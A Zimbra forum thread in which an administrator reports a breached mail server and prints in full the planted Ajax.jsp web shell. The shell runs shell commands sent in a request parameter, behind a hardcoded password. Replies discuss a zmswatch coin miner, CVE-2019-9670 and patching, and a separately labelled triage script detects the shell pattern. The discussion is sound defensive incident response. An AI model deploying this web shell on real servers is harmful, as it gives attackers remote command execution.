zimbra not listen in 443 port

seryoga_p
Posts: 4
Joined: Sat Apr 13, 2019 8:35 am

zimbra not listen in 443 port

Postby seryoga_p » Sat Apr 13, 2019 8:59 am

Hi, some strange things are going on with my mail server.

Code:

[zimbra@mail ~]$ zmcontrol -v
Release 8.7.1_GA_1670.RHEL7_64_20161025045328 RHEL7_64 FOSS edition.
[zimbra@mail ~]$


Today Zimbra suddenly stopped working on port 443 with the error:

Code:

HTTP ERROR 404
Problem accessing /public/error.jsp. Reason:

    /public/error.jsp


nginx is fine:

Code:

[zimbra@mail ~]$ lsof -i :443
COMMAND  PID   USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
nginx   2452 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
nginx   2453 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
nginx   2454 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
nginx   2455 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
[zimbra@mail ~]$

By chance I looked in the folder /opt/zimbra/jetty/webapps/zimbra/public/:

Code:

[root@mail log]# ls -l /opt/zimbra/jetty/webapps/zimbra/public/
total 52
-rw-rw-r-- 1 zimbra zimbra 1522 Jan 31 10:44 404.html
-rw-rw-r-- 1 zimbra zimbra 1534 Oct 25  2016 5xx.html
-rw-r----- 1 zimbra zimbra  332 Apr 12 21:08 Ajax.jsp
-rw-rw-r-- 1 zimbra zimbra 2789 Oct 25  2016 blankHistory.html
-rw-rw-r-- 1 zimbra zimbra 1389 Oct 25  2016 blank.html
-rw-rw-r-- 1 zimbra zimbra 2131 Oct 25  2016 empty.html
drwxrwxr-x 2 zimbra zimbra 4096 Dec 10  2016 flash
drwxrwxr-x 2 zimbra zimbra 4096 Apr 12 21:08 jsp
-rw-rw-r-- 1 zimbra zimbra 2293 Oct 25  2016 launch.html
drwxrwxr-x 2 zimbra zimbra 4096 Apr 12 21:08 proto
drwxrwxr-x 3 zimbra zimbra 4096 Dec 10  2016 sounds
-rw-rw-r-- 1 zimbra zimbra   33 Jan 31 10:39 test.txt
drwxrwxr-x 2 zimbra zimbra 4096 Dec 10  2016 tmp

There is a file Ajax.jsp modified yesterday:

Code:

[root@mail public]# cat Ajax.jsp
<%if("LVwpVsmayetL6cvL2YTonwYg".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}%>


Am I hacked? Is there any way to restore Zimbra functionality?


phoenix
Ambassador
Posts: 26207
Joined: Fri Sep 12, 2014 9:56 pm
Location: Liverpool, England

Re: zimbra not listen in 443 port

Postby phoenix » Sat Apr 13, 2019 9:09 am

seryoga_p wrote: Am I hacked? Is there any way to restore Zimbra functionality?
If you want to check then see if this applies to your server: https://forums.zimbra.org/viewtopic.php?f=15&t=65932
Regards

Bill

seryoga_p
Posts: 4
Joined: Sat Apr 13, 2019 8:35 am

Re: zimbra not listen in 443 port

Postby seryoga_p » Sat Apr 13, 2019 10:16 am

Fixed:
1. Upgrade to 8.7.11
2. Patch P10
Now everything is working.
GlooM
Advanced member
Posts: 82
Joined: Sat Sep 13, 2014 12:50 am

Re: zimbra not listen in 443 port

Postby GlooM » Thu Apr 18, 2019 7:03 pm

seryoga_p wrote: Fixed:
1. Upgrade to 8.7.11
2. Patch P10
Now everything is working.


Hello Seryoga :-)!
Please check this question: viewtopic.php?f=15&t=66031&p=289821#p289821
I think I was hacked the same way. Do you have a file /opt/zimbra/log/zmswatch?
seryoga_p
Posts: 4
Joined: Sat Apr 13, 2019 8:35 am

Re: zimbra not listen in 443 port

Postby seryoga_p » Fri Apr 19, 2019 11:35 am

GlooM wrote: Hello Seryoga :-)!
Please check this question: viewtopic.php?f=15&t=66031&p=289821#p289821
I think I was hacked the same way. Do you have a file /opt/zimbra/log/zmswatch?

Hi, GlooM :)
Yes, there are files zmswatch and zmswatch.out.
VirusTotal says it's a bitcoin miner.
GlooM
Advanced member
Posts: 82
Joined: Sat Sep 13, 2014 12:50 am

Re: zimbra not listen in 443 port

Postby GlooM » Fri Apr 19, 2019 1:25 pm

seryoga_p wrote: Yes, there are files zmswatch and zmswatch.out.
VirusTotal says it's a bitcoin miner.


As I understand it, the hacking technique is the same:
zmswatch is the miner, Ajax.jsp is the shell?

The latest patch is required to solve the problem. But this is not the same as described here: https://lorenzo.mile.si/zimbra-cve-2019 ... ction/961/ . There are no zmcat, l.sh or s.sh files, and less trash in /opt/zimbra/jetty/.

This is probably a newer hacking technique than the one previously described in CVE-2019-9670.
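A read-only triage script covering the two indicators this thread settles on (the Ajax.jsp command-execution pattern from the first post and the zmswatch files GlooM asks about), added here as an example and not anything posted in the thread. The /opt/zimbra prefix and the 7-day modification window are defaults I assumed; both can be overridden by the arguments.

```shell
#!/bin/sh
# Added example, not from the thread. Flags JSP files under the Zimbra
# webapps tree that carry the pattern seen in Ajax.jsp (a Runtime.getRuntime()
# .exec call fed from request.getParameter), lists JSPs modified recently,
# and reports whether the files named in the thread are present.
# The /opt/zimbra prefix and the 7-day window are assumed defaults.

# Usage: find_suspicious_jsp [webapps_dir] [days]
# Output lines: "PATTERN <file>" for content matches, "RECENT <file>" for
# JSPs whose mtime is within the window (a file can appear in both).
find_suspicious_jsp() {
    dir="${1:-/opt/zimbra/jetty/webapps}"
    days="${2:-7}"
    # Content check: both fixed strings (-F, no regex) must be in one file.
    find "$dir" -type f -name '*.jsp' 2>/dev/null | while IFS= read -r f; do
        if grep -qF 'Runtime.getRuntime().exec' "$f" \
           && grep -qF 'request.getParameter' "$f"; then
            printf 'PATTERN %s\n' "$f"
        fi
    done
    # Time check: any JSP changed inside the window, whatever its content.
    find "$dir" -type f -name '*.jsp' -mtime "-$days" 2>/dev/null \
        | while IFS= read -r f; do
        printf 'RECENT %s\n' "$f"
    done
}

# Usage: check_thread_artifacts [zimbra_prefix]
# Prints "PRESENT <path>" or "ABSENT <path>" for each file the thread names.
check_thread_artifacts() {
    prefix="${1:-/opt/zimbra}"
    for rel in jetty/webapps/zimbra/public/Ajax.jsp log/zmswatch log/zmswatch.out; do
        if [ -e "$prefix/$rel" ]; then
            printf 'PRESENT %s\n' "$prefix/$rel"
        else
            printf 'ABSENT %s\n' "$prefix/$rel"
        fi
    done
}
```

Source the file and call `find_suspicious_jsp` and `check_thread_artifacts` as the zimbra user; a PATTERN hit deserves the same treatment as the Ajax.jsp in the first post, and a RECENT hit in public/ on a host where no patch was applied that day is worth opening.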
seryoga_p
Posts: 4
Joined: Sat Apr 13, 2019 8:35 am

Re: zimbra not listen in 443 port

Postby seryoga_p » Fri Apr 19, 2019 1:47 pm

Scanned with ClamAV:
[root@mail log]# sudo clamscan -i -r /opt/zimbra/log
/opt/zimbra/log/zmswatch: Multios.Coinminer.Miner-6781728-2 FOUND


It would probably be more correct to make backups of Zimbra, reinstall CentOS, do a fresh Zimbra install and then restore the backup, but unfortunately there is no storage space on the rented VPS to recover mail quickly (now ~80GB).
I plan to stay on this VPS until the end of the year and then move to physical hardware with Zimbra or something else.
